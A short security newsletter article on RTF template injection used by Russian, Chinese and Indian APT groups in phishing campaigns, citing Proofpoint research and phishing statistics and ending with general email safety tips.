New Attack Method Makes Malware Injection A Breeze For APT Groups

Published: January 21, 2022 on our newsletter Security Fraud News & Alerts Newsletter.



Nation-state threat actors from Russia, China, and India are now using an easier way to launch malware phishing attacks against other nations, according to researchers at Proofpoint. The level of success and ease that these APT (advanced persistent threat) groups now have with an injection technique that infects PC’s is troubling. Proofpoint finds the involved nation-state’s RTF injection technique easily spreads malware and steals information from other governments. If there’s a new winner in the “Power Email Phishing Attack” category, this may be it.


RTF (Rich Text Format) templates are a frequently used feature for creating documents in Microsoft Office, especially for Word files. The attackers alter the RTFs document formatting to retrieve content from their malicious URL, allowing them to remotely install malware on a target’s device. Also, injected RTF files are difficult to detect by anti-virus software because the file type is so commonly used. As such, most organizations allow RTFs by default, making anti-virus solutions ineffective against them.



Just One Click…


According to Graphus, 48% of malicious attachments are Microsoft Office files, 94% of malware is delivered via email, and 80% of reported security incidents are linked to phishing attacks. Tessian reports that globally, nearly two million malicious emails passed typical email security defenses in just 12 months, from July 2020 to July 2021.


Not long ago, only certain file types such as .exe, .doc, .xls and were used to carry malware. Over time, other files were added to the watch list like .pdf and .zip. One thing these highly successful RTF attacks show is that any file type can be weaponized.


Remember, it only takes one wrong click to unleash malware and compromise an entire network. Knowing the red flags of email phishing can help a user from opening a suspicious message. Ultimately, the safest place for a questionable email is reporting it to your IT department or tossing it in the trash.


Email Phishing Security Tips

  • Think before you click. Phishing emails carry malware attachments and malicious links in the message, and acting on them can be the first step to installing malware on a system.

  • Never open email attachments, especially when they’re unexpected. Instead, directly verify the sender is a trusted source. It’s as simple as making a phone call.

  • Be aware of generic greetings, bad spelling or grammar in an email, as well as bad graphics such as a fuzzy company logo. A legitimate email shouldn’t have any typos, poor grammar, or questionable graphics

  • Look for any sense of urgency in an email. Hackers like to push us into acting quickly before there’s time to verify the email is legitimate.

  • Keep all software updated, especially for system, anti-virus, and apps. Updates typically have fixes to security bugs that leave all types of software and devices open to attack.


Keep up to date: Sign up for our Fraud alerts and Updates newsletter

Want to schedule a conversation? Please email us at advisor@nadicent.com


7 views0 comments